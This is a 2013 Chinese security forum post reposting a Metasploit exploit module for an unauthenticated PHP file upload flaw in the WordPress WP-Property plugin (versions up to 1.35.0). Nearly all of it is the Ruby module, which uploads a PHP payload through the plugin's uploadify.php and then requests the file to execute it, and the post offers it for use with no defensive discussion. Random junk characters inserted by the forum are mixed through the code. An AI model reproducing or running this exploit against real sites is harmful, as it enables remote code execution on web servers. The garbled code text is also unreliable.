找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2291|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞' F, _+ j) Y6 A/ R7 @+ v
% @* b5 d8 N# c0 u% x
## # This file is part of the Metasploit Framework and may be subject to
0 _: R. D) k  P- H' Z! i/ ]( V* \% R- N+ b( r( h
# redistribution and commercial restrictions. Please see the Metasploit2 D) e# V: \0 w7 Y& L# U" O) j

7 s; \# {: o. l# t# Framework web site for more information on licensing and terms of use.! k4 |$ s+ n1 c

% P7 A# O/ Y" F) `4 J8 Y0 I#   http://metasploit.com/framework/ ##
2 D# n( B3 i- l& M# K% n( o
2 `* B5 Z* Y7 p, [2 d: f7 M4 @
# V: Y) }7 g4 Y, l
: u  ]) U. \; S2 X3 z3 f: p' o # H( p4 _" L, a; h# H
; |, e/ t" ~( F5 Y0 l8 g0 e5 o, V
require 'msf/core'
6 W5 ^5 E/ l5 Orequire 'msf/core/exploit/php_exe'
0 s) }& a& u, ~7 a
7 |  b- X+ B- d1 A* x3 J9 E8 P  m- Oclass Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
. c; C: z. I. |3 r; {5 t. g'Description'    => %q{3 c4 E, J9 N, R2 c. ^
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
7 m1 s" `" k4 y2 e+ e, Z: g+ Q8 k[* P4 l! f2 ~( z# m: a
'Sammy FORGIT', # initial discovery
/ y  z) v! M! {( a'James Fitts <fitts.james[at]gmail.com>' # metasploit module0 D, H% {6 {$ Y3 G
],& }3 m5 Z( c3 Y1 P
'License'        => MSF_LICENSE,
4 K4 G# t4 o! _5 [; E* ^5 P'References'     =>
# \( p* W& `' L1 z  u) ^& z[, v0 V  S; B0 T1 f& Q& \, U6 Y$ Z
[ 'OSVDB', '82656' ],% v9 C- ~$ H& y; ]
[ 'BID', '53787' ],, W2 v( d% U( U! c
[ 'EDB', '18987'],8 m% Y0 r8 P; H
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
  ~/ o* _( j! r8 U2 w$ z],! K* Y  \* V' O5 }$ K  N, H3 M( j
'Payload'        =>
& s/ s9 H& B8 e{" r0 d/ @4 p4 ^' q4 C$ a
'BadChars' => "\x00",
! X/ p$ f$ H/ B: K0 \},
2 Y* \) E* H0 Z$ x  `+ h/ \- O'Platform'       => 'php',
/ J# A6 @7 u5 k* ^3 e+ ^7 a$ y'Arch'           => ARCH_PHP,* W6 `* @# L# ~* w/ u  J
'Targets'        =>
- D4 b# O4 y- m( ]& Z, m[
5 t2 s8 y* b* w  U. {( z( k9 q[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
  K$ n$ ?. i. [. v[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]" A" u9 z8 C2 ?5 J
],
' k7 N7 t- y! M% {$ Y'DefaultTarget'  => 0,6 ~+ V! b$ L! t5 w' C9 g
'DisclosureDate' => 'Mar 26 2012')); i! Q! W4 O; w6 B
4 Y& O# S7 P" l/ g6 B: ^
register_options(
/ d. T. C9 Z4 I. ?- b6 N[1 }% X% L# ?6 g- \! b4 }8 Z
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
2 T  a9 z! H! C/ m  }4 @" U& ]2 q], self.class)  J- Y# \; A% m' Q
end
8 b3 X# x2 |, v- z0 N. }
) T5 T# f) F8 `" i1 h, m# Vdef check
: d; e4 R3 J) `1 quri =  target_uri.path$ F; o- ?* U) g' `9 C: r
uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',, g% F' O" w; I
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
( n( [. A$ ?9 D7 M$ `" N5 |2 D})- O6 S$ }* C1 @: ?
, e& B; Z7 I3 h) Y. ~1 q; t; c9 T
if not res or res.code != 200
+ X6 E- l( \) d9 c; Vreturn Exploit::CheckCode::Unknown
( Q  y4 ^9 _5 d$ Wend
' G6 M" W0 x4 c3 R, G8 ]. u+ O/ w4 ~  U! r
return Exploit::CheckCode::Appears% N5 l2 ^6 ]( M
end
+ g+ I) x& Y. k! s6 N- @' s- h: [7 y8 j! D# D+ x$ B
def exploit: B- Y/ |( H' ^8 r( a& G3 P
uri =  target_uri.path  ]4 X- k1 e9 n" [: H2 ~
uri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)
% A7 U9 q6 S3 i# A
0 [9 a% S+ }% t( S5 f1 A" L$ qdata = Rex::MIME::Message.new0 S# G9 x5 A  E+ {7 @
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
7 L" J+ b( X6 B5 x) Y" H- Ddata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\""). V, m3 f1 S0 C) g9 J
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
- I( `, k8 @# z! |% p" o
$ L; C$ |: R. |print_status("#{peer} - Uploading payload #{@payload_name}")* b: ~' y$ y9 W5 w( }# ^6 }" _: |1 X
res = send_request_cgi({+ U/ b2 q' q$ k: S7 B
'method' => 'POST',
3 L% W& J8 d' K2 s4 @0 e& a9 x  h/ \'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
/ w+ D: l0 g: Q5 H$ p5 l'ctype'  => "multipart/form-data; boundary=#{data.bound}",
7 c+ v; V2 h' z( \/ p9 Q7 q3 p4 L'data'   => post_data. x% _0 j) D+ Q# l7 X+ s6 U1 y, e% Q8 e* P
})9 S# Q6 x8 i% X/ R) `/ d

  `# e5 U* |5 U# w  ^8 u: Hif not res or res.code != 200 or res.body !~ /#{@payload_name}/% o& G5 ]9 ?& D" o/ [
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
1 }. r  B( z6 L+ D* @end
$ j+ A3 C6 y7 u" C3 u) [& g9 ~( p1 R7 m4 K# u. d. P
upload_uri = res.body6 E$ O4 T8 \3 ]& u" i
* p$ Y0 m" k) K2 w+ {# d
print_status("#{peer} - Executing payload #{@payload_name}")
8 y# k0 ^8 ^$ H, {, T5 Gres = send_request_raw({, W0 n5 n' a) Y+ k5 q* j; W( ]
'uri'    => upload_uri,
( d8 o+ |- L+ H  \'method' => 'GET'
5 R7 E4 w$ d! ~})
4 C$ l/ Y, {6 I7 [7 u6 k5 oend' Z# C9 `- r% R) y/ Q
end
7 e+ j. d9 {! g9 Q+ x* p" O
! @( _2 t+ s; q7 \不要问我这写的是什么 怎么利用 我是说msf.
* i3 H* Y& d2 ^3 ~: Z$ T" J
+ t* d# f) T/ V* X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表